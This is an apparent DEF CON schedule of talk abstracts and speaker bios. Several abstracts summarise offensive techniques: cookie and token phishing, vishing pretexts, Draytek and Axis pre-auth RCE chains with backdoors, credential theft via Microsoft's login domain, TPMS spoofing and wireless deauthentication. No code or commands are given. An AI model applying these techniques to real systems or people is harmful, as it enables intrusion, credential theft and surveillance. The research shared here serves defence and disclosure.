SpeakerBio: Madhu "madhuakula" Akula, Pragmatic Security LeaderMadhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.
Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.
His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.
- ics Calendar file
At DEF CON 24, an SSH honeypot on the open network held a puzzle that would go on to inspire the first Walkthrough Workshop. Although the Walkthrough Workshops at the Packet Hacking Village no longer feature Cowrie, its echoes live on at DEF CON. Out of the box, Cowrie is a medium-interaction SSH honeypot, but this level of interaction can be raised with a little elbow grease. From custom commands and adventure games to file systems laid out as spatial cubes, this talk explores several years of Cowrie-based challenges that will bash your expectations of terminal interaction.
SpeakerBio: Ryan Mitchell, Principal Software Engineer at Gerson Lehrman GroupRyan Mitchell is a staff member at the Packet Hacking Village and the author of Unlocking Python (Wiley), Web Scraping with Python (O’Reilly), and multiple courses on LinkedIn Learning including Python Essential Training. She holds a master’s degree in software engineering from Harvard University Extension School and has worked as principal software engineer and data scientist on the search and artificial intelligence teams at the Gerson Lehrman Group for the last six years.
- ics Calendar file
The maritime industry is rapidly digitizing, but how well is it securing its foundational digital infrastructure? In this talk, we present the results of a large-scale passive reconnaissance effort targeting the top 50 global maritime organizations—leveraging only open source intelligence (OSINT) and LLM-assisted analysis. By focusing on core security controls such as DNS, email authentication protocols, and other foundational internet services, we uncover a troubling landscape. All data was collected non-intrusively and ethically, relying exclusively on public data. Results will be presented in an anonymized and aggregated fashion, with a strong emphasis on reproducibility. In true hacker village spirit, we will release all scripts and tools used—empowering attendees to replicate the analysis, audit other industries, or expand upon our methodology. This session will not only highlight the maritime sector’s digital weaknesses but also demonstrate how anyone with OSINT skills and curiosity can surface meaningful insights about critical industries—with zero packets sent to the targets.
Speakers:Vlatko Kosturjak,MJ CasadoVlatko Kosturjak serves as the VP of research at Marlink Cyber, boasting over two decades of dedicated experience in the realms of information security and cybersecurity. His diverse roles over the years have not only equipped him with a comprehensive understanding of security governance but also delved into the deep technical side of security. He have successful M&A experience in different fields of cyber security including application security.
Vlatko finds joy in both breaking and building security controls. Beyond his commitment to security, he harbors a deep passion for open and free software. This passion has manifested in the creation of numerous popular open-source offensive tools and contributions to various renowned free security software projects.
Throughout his extensive career and in his continuous pursuit of knowledge in the dynamic field of cybersecurity, Vlatko has acquired a long array of certifications, including CISSP, OSCP, CISM, and many more.
SpeakerBio: MJ Casado
- ics Calendar file
The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server based infrastructure, we will use server-less infra to launch stealth attacks rotating trusted implicit domains & integration directly with the productivity apps like slack, teams etc.
The flow of the workshop :
Workshop Duration : 120 Minutes
Speakers:Manish Gupta,Yash BharadwajManish Gupta is Director of CyberWarFare Labs having 7.5+ years of expertise in offensive Information Security. Where he specializes in Red Teaming Activities on enterprise Environment. His Research interest includes Real World Cyber Attack Simulation and Advanced persistent Threat (APT). Previously he has presented his research at reputed conferences like Blackhat USA, DEFCON, Nullcon, BSIDES Chapters, X33fcon, NorthSec & other corporate trainings etc.
SpeakerBio: Yash BharadwajYash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating Identity Based Attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership
- ics Calendar file
You've seen us swamp chillout areas guerilla style with tables full of stickers, but now we finally got our act together and have a formal place and time. Come swap stickers, chat with creators, and join the growing subculture of sticker lovers. Follow @dcstickerswap on Twitter for updates.
- ics Calendar file
Come stop by for our first offical event where we will have custom stickers for VX Underground, Skyhopper, and more!
- ics Calendar file
What is it actually like to support and balance a global anonymity network, with users ranging from political dissidents to national security analysts? You say it's important to teach law enforcement and governments about privacy and end-to-end encryption, but how do those conversations go in practice? I heard you accidentally got Russia to block all of Azure for a day? Are you ever going to do a Tor talk in China? Wait, who exactly tried to bribe you to leave bugs in Tor to support their criminal schemes?
Historically I've tried to downplay some of the excitement from operating the Tor network and teaching the world about Tor, but this year I'm going to try my hand at the "war stories" track.
References:
Roger Dingledine is co-founder and original developer of the Tor Project, a nonprofit that develops free and open source software to protect people from tracking, censorship, and surveillance online. Roger works with journalists and activists on many continents to help them understand and defend against the threats they face, and he is a lead researcher in the online anonymity field. EFF picked him for a Pioneer Award, and Foreign Policy magazine chose him as one of its top 100 global thinkers.
- ics Calendar file
Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.
SpeakerBio: Martin "tincho_508" Doyhenard, Security Researcher at PortSwiggerMartin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. Renowned for presenting multiples groundbreaking researches at premier conferences like Black Hat, DEFCON and RSA. Active participant in Capture The Flag (CTF) competitions and bug bounty programs, consistently uncovering critical vulnerabilities and driving innovation in cybersecurity.
- ics Calendar file
We all know that Business Continuity and Disaster Recovery are vitally important to every organization - but what about individuals? Explore how to protect yourself and your loved ones through ever-growing data mining, PII breaches, and socio-political upheaval with best practice BCDR techniques.
SpeakerBio: Rebecah MillerRebecah is a Business Continuity & Disaster Recovery consultant, creating and testing continuity and resilience plans across all organizational sectors. After working through a disaster at a company that was not prepared, she changed careers to focus on security and risk management in an effort to improve the resiliency of others.
- ics Calendar file
Attendees will get hands on with some AI pen testing techniques as based on the Instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.
SpeakerBio: Lee McWhorterLee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.
- ics Calendar file
What happens when you gather 4 hackers together to complete silly tasks, rank their execution, and see who ends up with the most points at the end? Taskmooster, that’s what. Inspired by the UK game show Taskmaster, TaskMooster is brings lateral thinking, comedic tasks, and general shenanigans to DEF CON. What? You haven’t heard of Taskmaster? Seriously, stop reading this program right now and go watch at least one episode. All seasons are available to stream on YouTube, and it’s totally binge-worthy.
Come join the contestants as they see how they performed for each task and get graded by our very own TaskMooster. The winner gets to take home the coveted Golden Telephone and bragging rights for being the TaskMooster champion.
The participants are selected in advance. We will film the pre-con tasks in Maryland several months before DEF CON and then will convene on stage at DEF CON in August for the live event.
None
- ics Calendar file
- ics Calendar file
Designed for wireless security testing and autonomous reconnaissance, Tengu Marauder v2 is a multi-terrain open-source robotic platform. Built around a Raspberry Pi and using ROS2, it combines real-time motor control, RF monitoring, and sensor data streaming to facilitate remote operations in challenging environments. Over the initial architecture, the v2 platform brings major enhancements in system modularity, communication security, and operational flexibility. Designed for safe remote access using encrypted VPN tunnels, the robot allows internet-based control and telemetry without endangering the system to direct network threats. Tengu Marauder v2 provides a tough, scalable basis for incorporating autonomy and cyber capabilities into your mobile security toolset whether used for off-grid automation, robotics teaching, or red teaming.
Speakers:Lexie "L3xic0n" Thach,Munir MuhammadLexie has worked in cybersecurity for ten years in various positions. During this time, she developed a strong affinity for electrical engineering, programming, and robotics engineering. Despite not having a traditional academic background, she has extensive hands-on experience from her eight years in the US Air Force, specializing in cybersecurity and tactical networks for aircraft missions and operations. Her focus on securing and testing the security of autonomous systems stems from these experiences, and she is passionate about sharing the techniques she has learned. She currently runs a local hackerspace in Philadelphia in support of DC215 called the Ex Machina Parlor where anyone can come to learn new hacking tools, try to build offensive or defensive security robots, and use 3D printers on standby for any prototyping people want.
SpeakerBio: Munir MuhammadMunir is a cybersecurity intern with the City of Philadelphia and a senior in college. He’s focused on learning how to keep computer systems safe from threats. He is especially interested in defensive security and enjoys finding new ways to protect networks and data. He is active in local tech meetups, works on open-source security projects, and is a member and community engagement coordinator at EMP (Ex Machina Parlor), a Philadelphia hackerspace where people can explore new hacking tools, build security robots, and use 3D printers for prototyping. He also supports students as a teaching assistant for software engineering courses. He is looking forward to meeting new people at DEF CON, learning from the community, and helping newcomers find their way into cybersecurity.
- ics Calendar file
After years of planning and development, the highly anticipated new version of rs0n's bug bounty hunting framework is ready to go! Aptly named The Ars0n Framework v2, this tool is specifically designed to help eliminate the friction for aspiring bug bounty hunters. This tool not only automates the most commonly used bug bounty hunting workflows but each section includes detailed lessons that help beginners understand the "Why?" behind the methodology. Finally (and perhaps most exciting of all), reports generated from the data collected provide the user with guidance at critical decision points based on rs0n's many years of bug bounty hunting experience. Simply put, this tool is designed to help beginners compete w/ the pros on Day 1, and the best part is it's absolutely FREE!
SpeakerBio: Harrison "rs0n" RichardsonHarrison Richardson (rs0n) began his Cybersecurity career in the US Army as a 25B. After leaving the service, Harrison worked various contract and freelance jobs while completing his Masters in Cybersecurity from the University of Dallas. Harrison's first full-time job in the civilian sector was at Rapid7, where he worked as a senior security solutions engineer as part of their Applied Engineering Team. Today, Harrison works as a product security engineer coving web applications, cloud, and AI systems. In his free time, Harrison develops a wide range of open-source tools and works to provide educational content to the bug bounty community through YouTube & Twitch.
- ics Calendar file
- ics Calendar file
Join in on the official DEF CON Pool Party for Food, Drinks, and Music!
- ics Calendar file
Watched the vishing competition and caught the bug? Welcome to the world of social engineering! Now let's turn that adrenaline into action. In this talk, I'm handing over the knowledge and worksheet that I use to plan my vishing calls, complete with pretext ideas, vishing tips and the kinds of pushback you might encounter on your calls. We'll dive into the art of social engineering over the phone. You'll learn how to build believable pretexts and what makes a voice sound trustworthy. I'll give you what you need to be ready to pick up the phone. You'll leave with everything you need, except a burner phone. And unlike Miranda Priestly, your targets won't even see you coming.
SpeakerBio: CronkittenCronkitten (they/them) is a cybersecurity professional, threat hunter, vishing competitor and relentless advocate for ethical social engineering. As a returning vishing competition contender Cronkitten thrives in the booth and on the phone. When they're not building new tools in the SOC, they're crafting pretexts, coaching newcomers, and teaching others how to dial with confidence, charisma and just the right amount of chaos (Ok, it's a lot of chaos, but the good kind). Equal parts charm and strategy, Cronkitten brings a hacker's mindset and a people-first approach to every call. Cronkitten says make that call, embrace the chaos and live in the meow-ment.
- ics Calendar file
DOM Clobbering is a type of code-reuse attack on the web that exploits naming collisions between DOM elements and JavaScript variables for malicious consequences, such as Cross-site Scripting.
In this talk, we present a novel systematization of DOM Clobbering exploitation in four stages, integrating existing techniques while introducing new clobbering primitives. Based on this foundation, we introduce Hulk, the first dynamic analysis tool to automatically detect DOM Clobbering gadgets and generate working exploits end-to-end.
Our evaluation revealed an alarming prevalence of DOM Clobbering vulnerabilities across the web ecosystem. We discovered 497 zero-day DOM Clobbering gadgets in the Tranco Top 5,000 sites, affecting popular client-side libraries, including Google Client API, Webpack, Vite, Rollup, and Astro—all of which have since acknowledged and patched the issue.
To complete our exploitation chain, we further study its trigger---HTML Injection vulnerability. Our systematic analysis of HTML Injection uncovered over 200 websites vulnerable to HTML injection. By combining them with our discovered gadgets, we demonstrated complete attack chains in popular applications like Jupyter Notebook/JupyterLab, HackMD.io, and Canvas LMS. This research has resulted in 19 CVE identifiers being assigned to date.
Speakers:Zhengyu Liu,Jianjia YuZhengyu Liu is a Ph.D. student in Computer Science at Johns Hopkins University, advised by Prof. Yinzhi Cao. His research focuses on Web Security, with an emphasis on systematic vulnerability study through automated program analysis techniques, including static/dynamic analysis, and LLM-integrated approaches. His first-author work has been published in top-tier venues such as IEEE S&P 2024 and USENIX Security 2025, and has received the Best Student Paper Award at ICICS 2022. His research has led to the discovery of many zero-day vulnerabilities in widely used software such as Azure CLI, Google Client API Library, and Jupyter Notebook/JupyterLab, resulting in over 30 CVEs in popular open-source projects (>1K Stars in Github) and acknowledgments from Microsoft, Google, Meta, and Ant Group.
SpeakerBio: Jianjia YuJianjia Yu is a PhD student at Johns Hopkins University. Her research focuses on the security and privacy of web and mobile applications, using program analysis. She received a Distinguished Paper Award at CCS 2023 for her work on browser extension vulnerabilities.
- ics Calendar file
In today's hyper-connected world, one vulnerability remains reliably exploitable: the human. Social engineering -- the manipulation of people to gain unauthorized access or extract sensitive information -- continues to outpace technical exploits in both effectiveness and stealth. But in the age of AI, these attacks are evolving faster, becoming more scalable, convincing, and harder to detect.
This talk explores the many faces of modern social engineering: from classic phishing, vishing, and physical intrusion, to AI-generated phishing emails, deepfake voice calls, and synthetic identities crafted by language models. We'll walk through real-world scenarios where attackers exploit trust, urgency, charm, and emotion—now enhanced by tools that can replicate human tone, write believable pretexts, and automate reconnaissance at scale.
You'll leave with a deeper understanding of how AI is supercharging social engineering, what this means for defenders and red teamers alike, and how to recognize the increasingly subtle cues of human-targeted compromise.
SpeakerBio: fir3d0gDavid has spent nearly 2 decades in cybersecurity, transitioning from systems and network administration to offensive security. He has successfully breached banks, law firms, government facilities, and more, all over the globe. David speaks at conferences nationwide, sharing knowledge and humorous stories. Prior to his career in cybersecurity, he served in the U.S. Army, including a tour in Iraq.
- ics Calendar file
The Illuminati Party is excited to open our doors once again to all those who wish to join us at DEF CON for an OPEN party welcoming all of our Hacker Family!
- ics Calendar file
Step into The Jasmine Dragon, an exclusive underground gathering where tradition meets the digital age, and the beat flows like perfectly executed code. With DJ Iroh dropping martial arts-inspired hip-hop, expect deep cuts, heavy bass, and an atmosphere that fuses cyberpunk aesthetics with ancient strategy. This isn’t just a party—it’s a cipher, a meeting of minds where warriors and tacticians alike can connect, scheme, and unwind. But entry isn’t for just anyone; only those who hold the right Pai Sho tile will unlock the door to this hidden node.
- ics Calendar file
Draytek routers are widely deployed edge devices trusted by thousands of organizations, and therefore remain a high-value target for attackers. Building on our prior DEFCON32 HHV presentation (https://www.youtube.com/watch?v=BiBMsw0N_mQ) on backdooring these devices, where we also exposed six vulnerabilities and released Draytek Arsenal (https://github.com/infobyte/draytek-arsenal), a toolkit to analyze Draytek firmware. We return with two new unauthenticated RCEs: CVE-2024-51138, a buffer overflow in STUN CGI handling, and CVE-2024-51139, an integer overflow in CGI parsing. When chained with our prior persistence techniques, these bugs enable a full device takeover and backdoor from the internet.
This talk provides an in-depth analysis of the new vulnerabilities and their exploitation strategies with demos and the full end-to-end exploitation chain. We’ll also explore their potential link to the mass Draytek reboot incidents of March 2025, suggesting that real-world exploitation of some of these vulnerabilities may already be underway. Attendees will gain insight into edge device exploitation, persistent compromise, and the importance of transparency and tooling in embedded security research.
Speakers:Octavio Gianatiempo,Gaston Aznarez
- ics Calendar file
The Pwnies are an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community. Every year, members of the infosec community nominate the best research and exploits they’ve seen. The Pwnie Award nominations are judged by a panel of respected security researchers and former pwnie award recipients – the closest to a jury of peers a hacker is likely to ever get. At this event DEF CON attendees will get a first person look at some of the most groundbreaking research and hacks in the cyber security community of the past year, and the winners get some well deserved recognition from the broader community for the great work they’ve done.
We do not have any strict prerequisites. We publish nominees ahead of time to give people a heads up that they may want to attend DEF CON to accept the award if they win.
Kind of! We accept nominees earlier in the year and then publish and announce them at Summercon every year. Summercon will be held in Brooklyn, NY on 7/11/2025. Members of the community and past Pwnie Award Winners then vote on who should win each category. Those winners are then announced during the show at DEF CON.
- ics Calendar file
- ics Calendar file
How Scam compounds in South East Asia are driving a wave of scams globally
- ics Calendar file
I will cover the tools available in the corporate network, the limitations of remote investigations, and the signatures of threat actors. All examples are cases I have actively worked in the past two years. This will range from the individual threat- timecard fraud identified thru network logs which led to the geolocation of an automated fingerprint device hidden in a facility to large numbers of contractors working in denied areas to ultimately the identification and mitigation of North Korean IT worker fraud within the network. 1. Speaker intro and brief background 1. On-site contractor must be on site daily between 9-5 but there was little work. They connected an older generation iPhone to the visitor network and hid it within a box in a cubicle away from foot traffic. 1. The device had the timecard app for $company which required a manual fingerprint touch/swipe geolocated to the customer site daily. 2. The contractor automated a device to have a synthetic flesh covering over a robotic finger which would press log in at 0900 and logout at 5pm monday-friday 3. The device was discovered by janitors and assumed to be an explosive device at first 4. Picture analysis revealed the make/model of the iPhone 5. I gained access to the visitor Wifi logs, found the MAC address of the iPhone/device name (named $contractor name) and the traffic going to the contractor timesheet website Other devices were also found with similar configurations for the user and his manager 2.How I was introduced to the IoT village thru chip off extraction of Chinese voting machine in 2022 by the IOT experts Description of voting machine prototype from china 4g connectivity, bluetooth, wifi but no true data ports for analysis Chip off extraction by IoT village (videos) end result of the analysis and where the images went for national security 3. North Korean IT Fraudulent worker hunting 1. Micro level- piKVM switch hunting on individual network detection level, now turned to an email alert via date ubea 2. Hints and clues via digital forensics- devices added to the workstation that are not related to the users 1. Kim’s iPhones connecting to George’s virtual machine 2. Multiple user devices (verified thru MAC address) connecting to the same workstation 3. Timecards being updated in HR systems in beijing/NK time zone on emulators 1. Can see it’s a linux device android phone whereas most legitimate users are either android or iPhone. Connecting to Wifi VPN router for all connections and forgetting 2fa is tied to the local infrastructure 4. User was being terminated from company A as a fraudulent worker and company B/C screens were in the background. With the screen shot time provided by our partner, I executed a windows event code search in splunk for devices locked within the window of the termination from company A. We ultimately found a full stack dev fitting the description of NKIT suspects with an Astrill VPN. While hunting for this user, we identified one working out of China and spoofing their location. The humint interview, while far from the iOt arena, revealed the user’s deception as they would not open the windows locally to prove they are in the same geographic time zone
SpeakerBio: Will Baggett, Will Baggett (@iOSforensic) is a Lead Investigator for Digital Forensics and Insider Threat at a Fiscal Infrastructure organization. He is also Director of Digital Forensics at Operation Safe Escape (volunteer role), a non-profit organization providing assistance to victims of domestic abuse.
- ics Calendar file
Operational Technology (OT) describes devices and protocols used to control real-world operations: factories, assembly lines, medical equipment, and so on.
For decades, this technology was isolated (more or less) from the wider world, using custom protocols and communications media. However, over the past 15 - 20 years, these devices have started using commodity protocols and media more and more. This means that these devices are now using the standard TCP/IP protocol suite, a concept referred to as "OT/IT convergence."
This convergence has obvious benefits, making these devices cheaper and more manageable. However, it also makes them more accessible to attackers, and their security posture has often not kept up.
As part of this convergence process, many devices are connected via protocol gateways. These gateways speak TCP/IP, and then translate communications to proprietary OT protocols (or simply provide a NAT-style private network within an OT device rack).
This talk discusses techniques for detecting devices on the "other side" of these gateways. It begins with a brief introduction to the history of OT, moving on to the OT/IT convergence phenomenon. It then discusses the issue of protocol translation and provides two practical examples of discovering assets across gateways: CIP (Common Industrial Protocol) message forwarding and DNP3 (Distributed Network Protocol, version 3) address discovery.
These techniques are provided as examples to illustrate the issue of OT device discovery, and to encourage the audience to perform further research in how these sorts of devices may be discovered on networks and, ultimately, protected.
SpeakerBio: Rob King, RunzeroRob King is the Director of Security Research at runZero. Over his career Rob has served as a senior researcher with KoreLogic, the architect for TippingPoint DVLabs, and helped get several startups off the ground. Rob helped design SC Magazine's Data Leakage Prevention Product of the Year for 2010, and was awarded the 3Com Innovator of the Year Award in 2009. He has been invited to speak at BlackHat, DEF CON, Shmoocon, SANS Network Security, and USENIX.
- ics Calendar file
TheTimeMachine is an offensive OSINT and bug bounty recon suite that revives forgotten endpoints from the past using the Wayback Machine. Designed for red teamers, CTF players, and bounty hunters, it automates historical data mining, subdomain extraction, parameter harvesting, and endpoint fuzzing for vulnerabilities like XSS, open redirect, LFI, and SQLi. The suite also integrates a powerful JWT analysis engine to extract, decode, and highlight juicy fields from tokens hidden in archived URLs. TheTimeMachine also hunts leaked archives and even verifies whether archived snapshots are still live. With colorful terminal output, modular CLI tools, and support for custom wordlists, this tool resurrects the buried past to exploit the forgotten future. Dead links don’t die here—they just get reconned harder.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. SachanArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Anmol "Fr13nd0x7f" K. SachanAnmol is a security consultant at NetSPI with expertise in web, API, AI/ML, and network penetration testing as well as attack surface management and offensive security automation. He has reported to over 50 organizations via VDPs, discovered multiple CVEs, and co-founded cybersecurity communities like CIA Conference and OWASP Chandigarh. He is also an active open-source contributor — his tools like WayBackLister, ThreatTracer, The Time Machine, and more have collectively earned over 600 GitHub stars. He is passionate about red teaming and building tools that enhance real-world security assessments.
- ics Calendar file
The accelerating evolution of technology, specifically AI, has created a "meta-system" so complex and intertwined with all domains of knowledge and human life that it effectively operates on a meta-level, shaping our reality and exceeding our control. The meta-system requires collaboration among all of its parts for effect management. We need to think on a meta-level because the meta-system is thinking about us in its own unique terms. We must adopt a "hacker" mindset – thinking critically, creatively, collaboratively, and systematically – to navigate this new reality.
SpeakerBio: Richard "neuralcowboy" ThiemeRichard Thieme who has published numerous articles and short stories, thirteen books, and has delivered hundreds of speeches. His recent Mobius Trilogy illuminates the impacts of security and intelligence work on practitioners. The trilogy was lauded by a 20-year CIA veteran as one of the five best works of serious spy fiction--ever. He spoke in 2022 at Def Con - which he is an uber-contributor-for the 26th year and keynoted the first two Black Hats. He has keynoted security conferences in 15 countries and clients range from GE, Microsoft, Medtronic, Bank of America, Allstate Insurance, and Johnson Controls to the NSA, FBI, US Dept of the Treasury. Los Alamos National Lab, the Pentagon Security Forum, and the US Secret Service.
- ics Calendar file
Backblaze Drive Stats is an open dataset that has tracked hard drive and SSD reliability across our data centers since 2013. This session covers recent backend upgrades—including a modular versioning system and migration to Snowflake with Trino and Iceberg—that improved data processing and failure validation. We'll also share updated AFR trends by drive model and size, SSD tracking challenges, and share how drive insights have underpinned performance improvements in data centers.
Speakers:Pat Patterson,Stephanie DoylePat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.
SpeakerBio: Stephanie Doyle, Associate Editor & Writer at BackblazeStephanie is the Associate Editor & Writer at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn.
- ics Calendar file
When the first measurement studies of the GFW came out in the early 2000s, computation and power consumption were 30,000X greater than they are today. Because of this, China’s GFW resided deeper in the network and further away from homes and data centers. The substantial increase in computational efficiency has made processing and filtering in-path and near connection end-points viable while the volume of network traffic in today’s Internet has made this design a virtual necessity. Russia’s censorship apparatus, the TSPU, has emerged as a state-of-the-art system, on par with the GFW, and a potentially more significant threat, particularly for users of Russian apps and data centers. There are two reasons for this. First, Russia’s design, which places censors in-path and closer to end-hosts (residential modems and data center connections), permits more granular, targeted attacks. Second, according to the Russian government, sanctions have compelled them to build their own certificate authority and require all Russian software to trust this certificate authority. Combining these two factors implies major threats to users interacting with Russian data centers and software. Fortunately, research has identified cases where the TSPU can be circumvented. New tools based on these ideas could be the future of circumvention.
References:
Censorship of VPNs today, link
SpeakerBio: Benjamin "bmixonbaca" Mixon-BacaI am a security researcher focused on Internet Freedom, censorship circumvention, and pwning middleboxes, firewalls, and other devices that are supposed to keep me "safe". I have developed attacks against VPN software. The one relevant to this presentation is CVE-2021-3773. This vulnerability affects VPNs but is actually because of issues in the firewall/connection tracking framework (e.g., Netfilter) of the underlying OS running the VPN. An attacker can use this vulnerability to redirect packets in various ways and can even let an attacker escalate from adjacent to-in-path between the victim and VPN server. I applied insights I gained while developing this attack to testing the TSPU and was able to develop bypass strategies. This is because the underlying design of connection tracking frameworks, such as how they track TCP states and direction, is basically the same for both network layer VPNs like OpenVPN and WireGuard and firewalls like the TSPU.
- ics Calendar file
What are the consequences if an adversary compromises the surveillance cameras of thousands of leading Western organizations and companies? As trust in Chinese-made IoT devices declines, organizations face limited alternatives—especially in video surveillance. Many governments have already banned Dahua and Hikvision products in sensitive facilities, further narrowing their choices. This concern drove our research, revealing that surveillance platforms can be double-edged swords.
We focused on Axis Communications, a major player in video surveillance widely used by U.S. government agencies, schools, medical facilities, and Fortune 500 companies.
In our talk, we will present an in-depth analysis of the Axis.Remoting communication protocol, uncovering critical vulnerabilities that allow attackers to achieve pre-auth RCE on Axis platforms. This access could serve as a gateway into an organization’s internal network via its surveillance infrastructure. Additionally, we identified a novel technique for passive data exfiltration, enabling attackers to map organizations using this equipment—potentially aiding in targeted attacks.
SpeakerBio: Noam MosheNoam Moshe is a vulnerability researcher and Team Lead at Claroty Team82. Noam specializes in vulnerability research, web applications pentesting, malware analysis, network forensics and ICS/SCADA security. In addition, Noam presented in well-known Hacking conferences like Blackhat/Defcon, as well as won Master of Pwn at Pwn2Own Miami 2023
- ics Calendar file
Microsoft Entra ID – one of the most used identity providers in the enterprise market. Or from our perspective: the most targeted platform in phishing attacks. Getting our phishing infrastructure up and running is usually the easy part. The real challenge is often keeping it online long enough to deliver the phishing link and collect credentials without detection before it gets burned.
But what if we could use Microsoft's official login domain for our phishing purposes? And no, I'm not talking about the heavily mitigated OAuth Consent or Device Code Phishing techniques, or simply hosting a phishing page on Azure Web App subdomains. I'm talking about stealing credentials directly from the legitimate login.microsoftonline.com domain.
In this talk, I will share multiple novel methods that can be used to achieve this. And the best of all? It all relies on legitimate functionality, making it mostly unpatchable. 😈
References:
SpeakerBio: Keanu "RedByte" Nys, SpotitKeanu Nys (aka RedByte) is an information security researcher from Belgium, and currently leads spotit's offensive security team. While he has a passion for all offensive cybersecurity topics, he mostly specializes in Active Directory, Microsoft Entra ID (Azure AD), and Social Engineering.
He is the author of the Microsoft 365 and Entra attack toolkit GraphSpy. Additionally, Keanu is the trainer for the Certified Azure Red Team Expert (CARTE) bootcamps at Altered Security, and has presented at hacker conferences such as BruCON.
He has presented at security conferences such as BruCon, and is the author of the Microsoft 365 and Entra attacking toolkit GraphSpy. He is an instructor for various Azure Red Teaming courses with Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
- ics Calendar file
In this talk we want to dive deep into the world of direct TPMS. These systems are used by a great portion of the cars today, and typically send information about a car’s tires wirelessly without any encryption or authentication. We show that it is feasible to capture these signals with very low cost hardware to build a tracking infrastructure. We present as well a tool that allows us to create custom TPMS messages and spoof the ECU of different cars.
SpeakerBio: Yago Lizarribar
- ics Calendar file
The Unmanned Wireless Penetration Testing Device is a modular, open-source system enabling remote wireless security assessments. Using long-range LoRa communication, a mobile rover can perform Wi-Fi reconnaissance, deauthentication attacks, Bluetooth device discovery, and image capture without requiring proximity to the target network. Controlled entirely via encrypted LoRa packets, the system is optimized for secure operations in remote or inaccessible environments. Attendees will see live demonstrations of wireless attacks issued over LoRa and learn how the system can be adapted for mobile and drone-based security operations. Source code and build instructions will be freely available under an open license.
